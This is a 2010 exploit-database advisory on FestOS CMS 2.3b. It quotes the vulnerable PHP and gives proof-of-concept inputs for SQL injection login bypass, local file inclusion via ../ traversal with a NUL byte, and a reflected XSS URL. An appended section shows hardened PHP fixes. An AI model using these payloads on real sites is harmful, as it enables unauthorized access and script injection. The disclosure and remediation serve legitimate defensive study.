[webapps / 0day] - FestOS CMS 2.3b Multiple Remote Vulnerabilities
Posted on 08 September 2010
Exploit category: webapps / 0day | Exploit author: Abysssec

===============================================
FestOS CMS 2.3b Multiple Remote Vulnerabilities
===============================================

Title            : FestOS CMS 2.3b Multiple Remote Vulnerabilities
Affected Version : <=2.3b
Vendor Site      : http://festengine.org/
Discovery        : abysssec.com

Description :

This CMS has many critical vulnerabilities; we describe some of them here.

Vulnerabilities :

1- SQL Injection Vulnerability :

1.1- in admin/do_login.php line 17:

    // Process the login
    $query = "SELECT userid, roleID, username FROM ".$config['dbprefix']."users WHERE LCASE(username) = '".strtolower($_POST['username'])."' and password ='".md5($_POST['password'])."'";
    $res = $festos->query($query);

poc: in admin.php page:

    username: admin' or '1'='1
    password: admin' or '1'='1

1.2- in festos_z_dologin.php:

    $query = "SELECT vendorID FROM ".$config['dbprefix']."vendors WHERE LCASE(email) = '".strtolower($_POST['email'])."' and password ='".$_POST['password']."'";

poc: in applications.php page:

    email: anything
    pass: a' or 1=1/*

2- Local File Inclusion (LFI):

Vulnerability in index.php, line 41:

    if(isset($_GET['theme']) && !empty($_GET['theme']) && file_exists($config['ABSOLUTE_FILE_PATH'].'themes/'.$_GET['theme'])) {
    ...
    require_once($themepath.'/includes/header.php');

poc:

    http://localhost/festos/index.php?theme=../admin/css/admin.css%00
    http://localhost/festos/artists.php?theme=../admin/css/admin.css%00
    http://localhost/festos/contacts.php?theme=../admin/css/admin.css%00
    http://localhost/festos/applications.php?theme=../admin/css/admin.css%00
    http://localhost/festos/entertainers.php?theme=../admin/css/admin.css%00
    http://localhost/festos/exhibitors.php?theme=../admin/css/admin.css%00
    http://localhost/festos/foodvendors.php?theme=../admin/css/admin.css%00
    http://localhost/festos/performanceschedule.php?theme=../admin/css/admin.css%00
    http://localhost/festos/sponsors.php?theme=../admin/css/admin.css%00
    http://localhost/festos/winners.php?theme=../admin/css/admin.css%00

3- Cross Site Scripting:

foodvendors.php includes the page festos_foodvendors.php. Lines 31-36:

    switch($switcher) {
        case 'details':
            if(!isset($_GET['vendorID']) || ctype_digit($_GET['vendorID'])===FALSE || $_GET['vendorID'] == '') {
                $template = 'foodvendors_nonespecified.tpl';
                break;
            }

and in line 74:

    $tpl->set('vType', $_GET['category']);

and foodvendors_nonespecified.tpl line 123:

    <p>Back to the list of <a href="<?php echo $_SERVER['PHP_SELF'];?>?view=list&vTypeID=<?php echo $vTypeID;?>" title="<?php echo $vType;?> Category">exhibitors in the <?php echo $vType;?> category</a>.</p>

The category parameter is echoed unescaped, so it is vulnerable to XSS.

poc:

    http://localhost/festos/foodvendors.php?view=details&vendorID=4&category=%3Ciframe%20src=javascript:alert%28%22XSS%22%29;&vTypeID=28

# Inj3ct0r.com (http://inj3ct0r.com/) [2010-09-08]
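Hardened counterparts to the three patterns quoted in the advisory (the string-built login query in admin/do_login.php, the theme check in index.php, and the raw echo of the category value in foodvendors_nonespecified.tpl), as an added example that is not part of the advisory or of FestOS. The PDO connection, the assumption that the users table stores a password_hash() value, the themes root path and every function name here are illustrative assumptions, not FestOS's own API.

```php
<?php
// Added example, not FestOS code. $pdo, the password_hash() column,
// $themeRoot and the function names below are assumptions.

// 1. Login lookup with a prepared statement. The username travels as a
//    bound parameter, so a quote inside it cannot terminate the SQL
//    literal and rewrite the WHERE clause the way the advisory's PoC does.
function findUser(PDO $pdo, string $prefix, string $username, string $password): ?array
{
    // $prefix comes from application config, not from the request.
    $sql = "SELECT userid, roleID, username, password FROM {$prefix}users "
         . "WHERE LCASE(username) = LCASE(:username)";
    $stmt = $pdo->prepare($sql);
    $stmt->execute([':username' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    // Verify the password in PHP against a password_hash() value rather than
    // comparing an md5 in the query (assumption: the column holds such a hash).
    if ($row === false || !password_verify($password, $row['password'])) {
        return null;
    }
    unset($row['password']);
    return $row;
}

// 2. Theme selection: accept only a bare directory name, then resolve it and
//    confirm it still lies under the themes root. This rejects "../" segments,
//    NUL bytes and anything with a path separator before file_exists() is asked.
function resolveTheme(string $themeRoot, string $requested): ?string
{
    // Letters, digits, '-' and '_' only: no slashes, dots or control bytes.
    if (!preg_match('/^[A-Za-z0-9_-]+$/', $requested)) {
        return null;
    }
    $root = realpath($themeRoot);
    $path = realpath($themeRoot . DIRECTORY_SEPARATOR . $requested);
    if ($root === false || $path === false || !is_dir($path)) {
        return null;
    }
    // Defence in depth: the canonical path must start with the canonical root.
    if (strpos($path, $root . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// 3. Template output: escape every request-derived value before it reaches
//    HTML text or an attribute. ENT_QUOTES covers both quote styles so the
//    value cannot break out of title="..." or href="...".
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// The "back to the list" link from the template, rebuilt with escaping.
function backLink(string $self, string $vTypeID, string $vType): string
{
    return '<p>Back to the list of <a href="' . h($self) . '?view=list&amp;vTypeID=' . h($vTypeID)
         . '" title="' . h($vType) . ' Category">exhibitors in the ' . h($vType)
         . ' category</a>.</p>';
}

// Constructed input reusing the advisory's category payload: the output
// contains &lt;iframe ... as inert text instead of a live element.
echo backLink('/festos/foodvendors.php', '28', '<iframe src=javascript:alert("XSS");'), "\n";

// Constructed input reusing the advisory's theme payload: the regex rejects it,
// so neither file_exists() nor require_once() is ever reached with it.
var_dump(resolveTheme(__DIR__ . '/themes', '../admin/css/admin.css'));   // NULL
```

For the second login query (festos_z_dologin.php) the same findUser() shape applies with email in place of username; the point in both cases is that the request value is bound, never concatenated. Note that resolveTheme() validates the name before touching the filesystem, so the NUL-byte truncation the PoC relies on is irrelevant: the candidate string never reaches a filesystem call.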